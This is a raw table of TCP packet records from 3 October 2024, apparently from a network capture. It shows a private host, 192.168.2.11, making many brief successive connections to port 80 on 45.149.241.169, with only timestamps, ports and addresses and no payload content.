Oct 3, 2024 09:21:16.917283058 CEST	64369	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:16.922230005 CEST	80	64369	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:17.069195032 CEST	64370	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:17.074018002 CEST	80	64370	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:17.074124098 CEST	64370	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:17.076250076 CEST	64370	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:17.081103086 CEST	80	64370	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:17.083632946 CEST	64370	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:17.088541985 CEST	80	64370	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:17.866369963 CEST	80	64370	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:17.866391897 CEST	80	64370	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:17.866523981 CEST	64370	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:17.866600037 CEST	64370	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:17.872168064 CEST	80	64370	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:18.010854006 CEST	64371	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:18.016283035 CEST	80	64371	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:18.016372919 CEST	64371	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:18.018455029 CEST	64371	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:18.023422956 CEST	80	64371	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:18.023488045 CEST	64371	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:18.028234959 CEST	80	64371	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:19.008034945 CEST	80	64371	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:19.008214951 CEST	64371	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:19.014470100 CEST	80	64371	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:19.014532089 CEST	64371	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:19.160871983 CEST	64372	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:19.165775061 CEST	80	64372	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:19.167788029 CEST	64372	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:19.169938087 CEST	64372	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:19.174781084 CEST	80	64372	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:19.175709009 CEST	64372	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:19.180566072 CEST	80	64372	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:21.428244114 CEST	80	64372	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:21.428539038 CEST	64372	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:21.428792953 CEST	80	64372	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:21.428858995 CEST	64372	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:21.433379889 CEST	80	64372	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:21.578989029 CEST	64373	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:21.585637093 CEST	80	64373	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:21.585773945 CEST	64373	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:21.587904930 CEST	64373	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:21.592727900 CEST	80	64373	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:21.592823982 CEST	64373	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:21.597687960 CEST	80	64373	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:22.234579086 CEST	80	64373	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:22.234736919 CEST	80	64373	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:22.234810114 CEST	64373	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:22.235256910 CEST	64373	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:22.239707947 CEST	80	64373	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:22.374394894 CEST	64374	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:22.379287004 CEST	80	64374	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:22.379380941 CEST	64374	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:22.381572008 CEST	64374	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:22.386459112 CEST	80	64374	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:22.386914968 CEST	64374	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:22.391767979 CEST	80	64374	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.090107918 CEST	80	64374	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.090142965 CEST	80	64374	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.090241909 CEST	64374	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:23.090287924 CEST	64374	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:23.095072031 CEST	80	64374	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.234726906 CEST	64375	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:23.239660978 CEST	80	64375	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.239794970 CEST	64375	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:23.241945982 CEST	64375	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:23.246740103 CEST	80	64375	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.246841908 CEST	64375	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:23.251600027 CEST	80	64375	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.948323011 CEST	80	64375	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.948483944 CEST	64375	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:23.948685884 CEST	80	64375	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:23.948740005 CEST	64375	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:23.953248024 CEST	80	64375	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:24.092489004 CEST	64376	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:24.097281933 CEST	80	64376	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:24.097440004 CEST	64376	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:24.099610090 CEST	64376	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:24.104384899 CEST	80	64376	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:24.104473114 CEST	64376	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:24.109239101 CEST	80	64376	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:24.875488997 CEST	80	64376	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:24.875575066 CEST	80	64376	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:24.875611067 CEST	64376	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:24.875654936 CEST	64376	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:24.880425930 CEST	80	64376	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.016508102 CEST	64378	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.021584988 CEST	80	64378	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.021671057 CEST	64378	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.024096966 CEST	64378	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.029166937 CEST	80	64378	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.029227972 CEST	64378	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.034338951 CEST	80	64378	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.669203997 CEST	80	64378	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.669226885 CEST	80	64378	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.669334888 CEST	64378	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.669445038 CEST	64378	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.674220085 CEST	80	64378	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.808263063 CEST	64379	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.813195944 CEST	80	64379	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.813307047 CEST	64379	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.815433979 CEST	64379	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.820269108 CEST	80	64379	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:25.820374966 CEST	64379	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:25.825217009 CEST	80	64379	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:26.688807011 CEST	80	64379	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:26.688957930 CEST	80	64379	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:26.688957930 CEST	64379	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:26.689008951 CEST	64379	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:26.693892956 CEST	80	64379	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:26.839411974 CEST	64380	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:26.844430923 CEST	80	64380	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:26.844552994 CEST	64380	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:26.846657991 CEST	64380	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:26.851516962 CEST	80	64380	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:26.851586103 CEST	64380	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:26.856379986 CEST	80	64380	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:27.634349108 CEST	80	64380	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:27.634529114 CEST	80	64380	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:27.634586096 CEST	64380	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:27.634634972 CEST	64380	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:27.639570951 CEST	80	64380	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:27.796695948 CEST	64381	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:27.801590919 CEST	80	64381	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:27.801700115 CEST	64381	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:27.805084944 CEST	64381	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:27.810060978 CEST	80	64381	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:27.810226917 CEST	64381	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:27.815283060 CEST	80	64381	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:28.548094988 CEST	80	64381	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:28.548333883 CEST	64381	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:28.548427105 CEST	80	64381	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:28.548512936 CEST	64381	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:28.553342104 CEST	80	64381	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:28.685456038 CEST	64382	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:28.690521955 CEST	80	64382	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:28.690726042 CEST	64382	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:28.692899942 CEST	64382	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:28.697794914 CEST	80	64382	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:28.697925091 CEST	64382	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:28.703325033 CEST	80	64382	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:29.432213068 CEST	80	64382	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:29.432230949 CEST	80	64382	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:29.432240009 CEST	80	64382	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:29.432337046 CEST	64382	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:29.432396889 CEST	64382	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:29.437160015 CEST	80	64382	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:29.579591990 CEST	64383	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:29.584657907 CEST	80	64383	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:29.584817886 CEST	64383	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:29.586962938 CEST	64383	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:29.591722012 CEST	80	64383	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:29.591806889 CEST	64383	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:29.596569061 CEST	80	64383	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:30.259722948 CEST	80	64383	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:30.259852886 CEST	80	64383	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:30.259881020 CEST	64383	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:30.259915113 CEST	64383	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:30.264753103 CEST	80	64383	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:30.401187897 CEST	64384	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:30.406111956 CEST	80	64384	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:30.406224012 CEST	64384	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:30.408480883 CEST	64384	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:30.413429022 CEST	80	64384	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:30.413511038 CEST	64384	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:30.421405077 CEST	80	64384	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:31.213476896 CEST	80	64384	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:31.213525057 CEST	80	64384	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:31.213756084 CEST	64384	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:31.213756084 CEST	64384	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:31.218884945 CEST	80	64384	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:31.437197924 CEST	64385	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:31.442122936 CEST	80	64385	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:31.442192078 CEST	64385	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:31.493468046 CEST	64385	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:31.498548985 CEST	80	64385	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:31.498785019 CEST	64385	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:31.503812075 CEST	80	64385	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:32.591485977 CEST	80	64385	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:32.591532946 CEST	80	64385	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:32.591567039 CEST	80	64385	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:32.591620922 CEST	80	64385	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:32.591622114 CEST	64385	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:32.591646910 CEST	64385	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:32.591676950 CEST	64385	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:32.591737986 CEST	64385	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:32.603313923 CEST	80	64385	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:32.730734110 CEST	64386	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:32.735788107 CEST	80	64386	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:32.735914946 CEST	64386	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:32.738049984 CEST	64386	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:32.742938042 CEST	80	64386	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:32.743030071 CEST	64386	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:32.747910023 CEST	80	64386	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:33.386100054 CEST	80	64386	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:33.386162996 CEST	80	64386	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:33.386243105 CEST	64386	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:33.386312008 CEST	64386	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:33.391128063 CEST	80	64386	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:33.544037104 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:33.548964977 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:33.549132109 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:33.551290035 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:33.556114912 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:33.556186914 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:33.561033964 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.070835114 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.070897102 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.070961952 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.070998907 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.071001053 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.071048021 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.071057081 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.071113110 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.071317911 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.071376085 CEST	64387	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.075961113 CEST	80	64387	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.226890087 CEST	64388	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.231770992 CEST	80	64388	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.231879950 CEST	64388	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.234649897 CEST	64388	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.239480972 CEST	80	64388	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:35.239656925 CEST	64388	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:35.244488955 CEST	80	64388	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:46.491751909 CEST	80	64388	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:46.491935968 CEST	64388	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:46.497212887 CEST	80	64388	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:46.497302055 CEST	64388	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:46.635451078 CEST	64389	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:46.640335083 CEST	80	64389	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:46.640459061 CEST	64389	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:46.642540932 CEST	64389	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:46.647428989 CEST	80	64389	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:46.647500992 CEST	64389	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:46.652298927 CEST	80	64389	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:47.323739052 CEST	80	64389	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:47.323792934 CEST	80	64389	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:47.323869944 CEST	64389	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:47.323951960 CEST	64389	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:47.328778028 CEST	80	64389	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:47.475168943 CEST	64390	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:47.480048895 CEST	80	64390	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:47.480123997 CEST	64390	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:47.482239008 CEST	64390	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:47.487018108 CEST	80	64390	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:47.487101078 CEST	64390	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:47.491822004 CEST	80	64390	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:48.280944109 CEST	80	64390	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:48.281086922 CEST	80	64390	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:48.281111956 CEST	64390	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:48.281152010 CEST	64390	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:48.285933971 CEST	80	64390	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:48.428493977 CEST	64391	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:48.433464050 CEST	80	64391	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:48.433594942 CEST	64391	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:48.435915947 CEST	64391	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:48.440732002 CEST	80	64391	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:48.440835953 CEST	64391	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:48.445628881 CEST	80	64391	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:49.089157104 CEST	80	64391	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:49.089190006 CEST	80	64391	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:49.089315891 CEST	64391	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:49.090689898 CEST	64391	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:49.095496893 CEST	80	64391	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:49.246395111 CEST	64392	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:49.251543045 CEST	80	64392	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:49.251696110 CEST	64392	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:49.253714085 CEST	64392	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:49.258609056 CEST	80	64392	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:49.258711100 CEST	64392	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:49.263506889 CEST	80	64392	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:50.342468977 CEST	80	64392	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:50.342504025 CEST	80	64392	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:50.342534065 CEST	80	64392	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:50.342572927 CEST	64392	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:50.342605114 CEST	64392	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:50.342633009 CEST	80	64392	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:50.343709946 CEST	64392	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:50.347537994 CEST	80	64392	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:50.487448931 CEST	64393	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:50.492552996 CEST	80	64393	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:50.492674112 CEST	64393	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:50.494801044 CEST	64393	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:50.499613047 CEST	80	64393	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:50.499694109 CEST	64393	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:50.504566908 CEST	80	64393	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.137919903 CEST	80	64393	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.137959957 CEST	80	64393	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.138044119 CEST	64393	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:51.138096094 CEST	64393	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:51.142841101 CEST	80	64393	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.275259018 CEST	64394	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:51.280193090 CEST	80	64394	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.280438900 CEST	64394	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:51.282442093 CEST	64394	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:51.287404060 CEST	80	64394	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.287565947 CEST	64394	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:51.292344093 CEST	80	64394	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.987176895 CEST	80	64394	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.987230062 CEST	80	64394	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:51.987281084 CEST	64394	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:51.987358093 CEST	64394	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:51.992201090 CEST	80	64394	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.135682106 CEST	64395	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.141613007 CEST	80	64395	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.141722918 CEST	64395	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.143836975 CEST	64395	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.148648977 CEST	80	64395	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.148747921 CEST	64395	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.155999899 CEST	80	64395	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.824364901 CEST	80	64395	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.824383020 CEST	80	64395	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.824431896 CEST	64395	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.825124025 CEST	64395	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.829890966 CEST	80	64395	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.965944052 CEST	64396	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.972373962 CEST	80	64396	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.972479105 CEST	64396	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.975395918 CEST	64396	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.981678009 CEST	80	64396	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:52.981934071 CEST	64396	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:52.988246918 CEST	80	64396	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:53.812876940 CEST	80	64396	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:53.813082933 CEST	80	64396	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:53.813148022 CEST	64396	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:53.822036028 CEST	64396	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:53.827050924 CEST	80	64396	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:53.990683079 CEST	64397	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:53.996016979 CEST	80	64397	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:53.996141911 CEST	64397	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:53.998188972 CEST	64397	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:54.007059097 CEST	80	64397	45.149.241.169	192.168.2.11
Oct 3, 2024 09:21:54.007169008 CEST	64397	80	192.168.2.11	45.149.241.169
Oct 3, 2024 09:21:54.018230915 CEST	80	64397	45.149.241.169	192.168.2.11
